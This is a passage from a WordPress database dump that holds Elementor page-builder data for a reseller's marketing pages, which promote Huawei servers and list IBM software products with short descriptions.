services.<\\/div><\\/div><\\/div><\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bf75fa8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6a97ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ff5b88b\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0b042b9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6e6673f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"411a824\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why Huawei Servers?\",\"align\":\"center\",\"title_color\":\"#262626\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2106125\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7bc1fd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ef3e7b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"txtbox mask-gradient\\\"><h3 style=\\\"text-align: center;\\\"><strong>Efficient and Reliable<\\/strong><\\/h3><p>To ensure that we meet customer requirements for servers, Huawei implements stringent quality control across eight processes, including product planning, R&amp;D, supply chain management, and post-sales service. Before delivery, each product has undergone more than 2,000 hardware tests, 10,000 software tests, and 300 entry certifications.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b64a664\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5297401\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Continuous Innovation<\\/strong><\\/h3><p>Huawei\\u2019s Boundless Computing strategy accelerates innovation at the chip level across computing, storage, and networking technologies, moving enterprise intelligence toward a better-connected, smart world. Huawei has focused its years of R&amp;D development efforts by setting up global OpenLabs to collaborate with top partners.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3e872db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3841f1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Trustworthy<\\/strong><\\/h3><p>Huawei successfully cooperates with customers and technology partners, striving to provide open computing infrastructure that supports optimal customer and partner outcomes. With solid reliability, excellent performance, and easy integration, Huawei servers are used by more than 5,000 customers worldwide in more than 25 sectors.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5c750f60\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3bd8e1c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d5be247\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"sub-title\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"txtbox mask-gradient\\\"><div class=\\\"sub-title\\\"><div><div class=\\\"txtbox mask-gradient\\\" style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/div><\\/div><\\/div><\\/div><\\/div><\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8607,3031,'_elementor_css','a:5:{s:4:\"time\";i:1571988725;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8475,1530,'_elementor_edit_mode','builder'),(8476,1530,'_elementor_template_type','post'),(8477,1530,'_elementor_version','2.5.14'),(8484,3642,'_wp_page_template','template-fullwidth.php'),(8485,3642,'_elementor_edit_mode','builder'),(8486,3642,'_elementor_template_type','post'),(8487,3642,'_elementor_version','2.5.14'),(8488,3642,'_elementor_data','[{\"id\":\"f48873c\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\"},\"elements\":[{\"id\":\"6baeca2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"4aa969a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">IBM Software<\\/h2><h4 style=\\\"text-align: center;\\\">IBM Business Solution<\\/h4>\",\"typography_typography\":\"custom\",\"typography_line_height\":{\"unit\":\"em\",\"size\":0.1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"text_columns\":\"1\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fdb3e88\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"28957ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"92637b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Sterling Commerce<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Use eCommerce, connectivity and integration to deliver personalized retail experiences<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e21d266\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7b73a54\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Coremetrics<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Analyze data from customer behavior to uncover trends and insights for targeted marketing<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"991952a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"da4ea06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Unica<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Deliver single, personalized experiences across channels to increase customer engagement<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a372cdb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d032b2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Tealeaf<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Explore digital customer experience management and customer behavior analysis solutions<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c2ba9c1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5caf251\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89ffec2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e37ba3d\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\"},\"elements\":[{\"id\":\"93fbbb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"0e2e5cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">IBM Software<\\/h2><h4 style=\\\"text-align: center;\\\">IBM IT Infrastructure<\\/h4>\",\"typography_typography\":\"custom\",\"typography_line_height\":{\"unit\":\"em\",\"size\":0.1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"text_columns\":\"1\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1914b45\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"1ec5aea\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"624a0e4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM WebSphere Application Server<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Develop next generation Java apps in the cloud and pay as you go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f466f1e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c811dff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM MQ<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Accelerate the integration of applications and business data across multiple platforms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a5c5569\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2ad8f10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM and Apache Spark<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Create algorithms and speed analytics applications to gain insights from complex data<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ff81915\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a3a6828\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Spectrum Protect<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Protect and recover data for virtual, physical, cloud and software-defined environments<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dea0abf\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"b690577\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"31c8e6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM z\\/OS Connect Enterprise Edition<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Develop efficient and scalable RESTful APIs for mobile and cloud apps<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d96abeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4483c35\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM UrbanCode Deploy<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Automate the application deployment process to accelerate time to market<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eaf428e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7d1a0b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>CICS<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Use high-performance enterprise application servers for Z Systems with support for a range of languages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d2eb499\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"685ba09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Information Management System (IMS)<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Explore a fast and security-rich hierarchical database manager for OLTP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1592bfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d71a61b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4e4f3b1\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"21a4a58\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\"},\"elements\":[{\"id\":\"4c4b8c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"3a26eaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">IBM Software<\\/h2><h4 style=\\\"text-align: center;\\\">IBM Analytics<\\/h4>\",\"typography_typography\":\"custom\",\"typography_line_height\":{\"unit\":\"em\",\"size\":0.1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"text_columns\":\"1\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f59fcbe\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"4b173c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"db8bb6c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Cognos Analytics on Cloud<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Uncover new insights quickly and easily with automated data analysis, automatic visualization and predictive analytics<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"93f69c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"54c5e83\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM SPSS<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Get deeper, more meaningful insights from your data and predict what is likely to happen next<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99407eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c122681\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Maximo<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Manage physical assets on a common platform for better asset lifecycle and maintenance management<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"afc92fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"57ba327\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM DB2 on Cloud<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Explore no-boundaries database software for the digital, cloud and cognitive era<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2aa8c0b2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3b548ed9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"53b33272\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8483,1530,'_elementor_data','[{\"id\":\"f48873c\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\"},\"elements\":[{\"id\":\"6baeca2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"4aa969a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">IBM Software<\\/h2><h4 style=\\\"text-align: center;\\\">IBM Business Solution<\\/h4>\",\"typography_typography\":\"custom\",\"typography_line_height\":{\"unit\":\"em\",\"size\":0.1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"text_columns\":\"1\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fdb3e88\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"28957ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"92637b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Sterling Commerce<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Use eCommerce, connectivity and integration to deliver personalized retail experiences<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e21d266\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7b73a54\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Coremetrics<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Analyze data from customer behavior to uncover trends and insights for targeted marketing<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"991952a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"da4ea06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Unica<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Deliver single, personalized experiences across channels to increase customer engagement<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a372cdb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d032b2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Tealeaf<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Explore digital customer experience management and customer behavior analysis solutions<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c2ba9c1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5caf251\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89ffec2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e37ba3d\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\"},\"elements\":[{\"id\":\"93fbbb0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"0e2e5cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">IBM Software<\\/h2><h4 style=\\\"text-align: center;\\\">IBM IT Infrastructure<\\/h4>\",\"typography_typography\":\"custom\",\"typography_line_height\":{\"unit\":\"em\",\"size\":0.1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"text_columns\":\"1\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1914b45\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"1ec5aea\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"624a0e4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM WebSphere Application Server<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Develop next generation Java apps in the cloud and pay as you go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f466f1e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c811dff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM MQ<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Accelerate the integration of applications and business data across multiple platforms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a5c5569\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"2ad8f10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM and Apache Spark<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Create algorithms and speed analytics applications to gain insights from complex data<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ff81915\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a3a6828\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Spectrum Protect<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Protect and recover data for virtual, physical, cloud and software-defined environments<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dea0abf\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"b690577\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"31c8e6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM z\\/OS Connect Enterprise Edition<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Develop efficient and scalable RESTful APIs for mobile and cloud apps<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d96abeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4483c35\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM UrbanCode Deploy<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Automate the application deployment process to accelerate time to market<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eaf428e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7d1a0b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>CICS<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Use high-performance enterprise application servers for Z Systems with support for a range of languages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d2eb499\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"685ba09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Information Management System (IMS)<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Explore a fast and security-rich hierarchical database manager for OLTP<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1592bfc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d71a61b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4e4f3b1\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"21a4a58\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\"},\"elements\":[{\"id\":\"4c4b8c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":0,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"3a26eaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">IBM Software<\\/h2><h4 style=\\\"text-align: center;\\\">IBM Analytics<\\/h4>\",\"typography_typography\":\"custom\",\"typography_line_height\":{\"unit\":\"em\",\"size\":0.1,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"text_columns\":\"1\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f59fcbe\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"4b173c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"db8bb6c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Cognos Analytics on Cloud<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Uncover new insights quickly and easily with automated data analysis, automatic visualization and predictive analytics<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"93f69c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"54c5e83\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM SPSS<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Get deeper, more meaningful insights from your data and predict what is likely to happen next<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99407eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c122681\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM Maximo<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Manage physical assets on a common platform for better asset lifecycle and maintenance management<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"afc92fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"57ba327\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>IBM DB2 on Cloud<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Explore no-boundaries database software for the digital, cloud and cognitive era<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2aa8c0b2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3b548ed9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"53b33272\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" 